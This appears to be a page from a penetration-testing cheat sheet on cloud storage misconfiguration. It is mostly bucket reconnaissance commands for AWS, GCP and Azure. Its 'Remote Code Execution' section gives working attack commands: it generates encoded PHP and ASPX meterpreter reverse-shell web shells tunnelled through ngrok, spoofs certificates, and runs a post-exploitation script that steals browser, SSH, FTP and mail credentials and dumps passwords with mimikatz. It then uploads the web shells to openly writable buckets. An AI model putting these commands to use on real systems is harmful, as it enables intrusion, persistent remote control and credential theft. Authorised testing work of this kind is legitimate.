Cloud Storage

Check List

Assess that the access control configuration for the storage services is properly in place.

Cheat Sheet

WHOIS Lookup

Host

Domain to IP

host $WEBSITE

Whois

Company Info

whois $WEBSITE

IP to ASN

whois -h whois.cymru.com -v $TARGET

cURL

HTTP Headers

curl -I $WEBSITE

Check Robots

curl $WEBSITE/robots.txt

DNS Enum

DNSEnum

DNS Records

dnsenum $WEBSITE

Dig

dig +short $WEBSITE

Subdomain Enum

SubFinder & ShuffleDNS

Subdomains

echo "1.1.1.1" > /tmp/resolvers.txt; \
subfinder -d $WEBSITE -all | \
shuffledns -d $WEBSITE -r /tmp/resolvers.txt -mode resolve

Source URLs

Katana

GCP

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+storage\.googleapis\.com[^ ]*"

AWS

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.amazonaws\.com"

Azure

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.blob.core.windows\.net"

Certificate Transparency

Cert.sh

curl -s "https://crt.sh/?q=%25.$WEBSITE&output=json" | jq .

Wayback Machine

GCP

echo $WEBSITE | gau | grep -E "storage\.googleapis\.com|.*\.storage.googleapis.com"

AWS

echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.amazonaws\.com|s3\.amazonaws\.com"

Azure

echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.blob.core.windows\.net|s3\.blob.core.windows\.net"

Nmap

GCP

nmap -p 80,443 \
     --script http-title,http-headers $BUCKET.storage.googleapis.com

AWS

nmap -p 80,443 \
     --script http-title,s3open $BUCKET.s3.amazonaws.com

Azure

nmap -p 80,443 \
     --script http-title,azure-enum $CONTAINER.blob.core.windows.net

Nuclei

nuclei -u $WEBSITE \
       -tags aws gcp azure cloud cloud-Enum aws-cloud-config azure-cloud-config

Open Source Intelligence

Google

GCP

site:$WEBSITE inurl:"storage.googleapis.com" | 
site:$WEBSITE inurl:"googleusercontent.com"

AWS

site:$WEBSITE inurl:"amazonaws.com" | 
site:s3.amazonaws.com $WEBSITE

Azure

site:$WEBSITE inurl:"blob.core.windows.com" | 
site:blob.core.windows.com $WEBSITE

Shodan

shodan search net:"$TARGET/24"

Censys

services.http.response.body: {"s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net"}

CloudBrute

GCP

wget https://raw.githubusercontent.com/RhinoSecurityLabs/GCPBucketBrute/refs/heads/master/permutations.txt \
    -O /tmp/gcp_buckets.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "gcp" \
    -w /tmp/gcp_buckets.txt

AWS

wget https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/refs/heads/master/list.txt \
    -O /tmp/s3_bucket_list.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "s3" \
    -w /tmp/s3_bucket_list.txt

Azure

wget https://raw.githubusercontent.com/Macmod/goblob/refs/heads/main/wordlists/goblob-folder-names.txt \
    -O /tmp/AzureBlob.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "azure" \
    -w /tmp/AzureBlob.txt

Nmap

nmap -p 80,443 \
     --script http-title,http-open-proxy,ssl-cert,http-enum,http-robots.txt,http-auth-finder,s3-buckets,s3-ls,s3-object,s3-enum,s3-brute \
     $CONTAINER.blob.core.windows.net \
     $BUCKET.storage.googleapis.com \
     $BUCKET.s3.amazonaws.com

Remote Code Execution

Weevely

Create Web Shell PHP

weevely generate 00980098 /tmp/unk9vvn.php

Create Web Shell ASPX

cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx

Metasploit

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Web shell PHP

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 \
         -i 3 \
         -o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Generate Web Shell ASP

msfvenom -p windows/meterpreter/reverse_winhttps \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f asp > /tmp/unk9vvn.aspx

Listening Metasploit PHP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Listening Metaploit ASP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD windows/meterpreter/reverse_winhttps;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

AWS S3

Connection Test

aws s3 ls s3://$BUCKET.s3.amazonaws.com --no-sign-request

Upload File Testing

aws s3 cp /tmp/unk9vvn.php s3://$BUCKET.s3.amazonaws.com --no-sign-request

Success Upload File Testing

aws s3 cp s3://$BUCKET.s3.amazonaws.com/unk9vvn.php . --no-sign-request

HTTP Connection Testing

curl -I https://$BUCKET.s3.amazonaws.com/unk9vvn.php

GCP

Connection Test

gsutil ls gs://$BUCKET

Upload File Testing

gsutil cp /tmp/unk9vvn.php gs://$BUCKET

Success Upload File Testing

gsutil cp gs://$BUCKET/unk9vvn.php .

HTTP Connection Testing

curl -I http://storage.googleapis.com/$BUCKET/unk9vvn.php

Azure

Connection Test

az storage blob list \
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --output table

Upload File Testing

az storage blob upload \
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --name unk9vvn.aspx \
    --file /tmp/unk9vvn.aspx \
    --auth-mode login

Success Upload File Testing

az storage blob download 
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --name unk9vvn.aspx \
    --file /tmp/test_unk9vvn.aspx \
    --auth-mode login

HTTP Connection Testing

curl -I https://$ACCOUNT.blob.core.windows.net/$CONTAINER/unk9vvn.aspx

PreviousSubdomain Takeover NextContent Security Policy

Last updated 3 months ago

Was this helpful?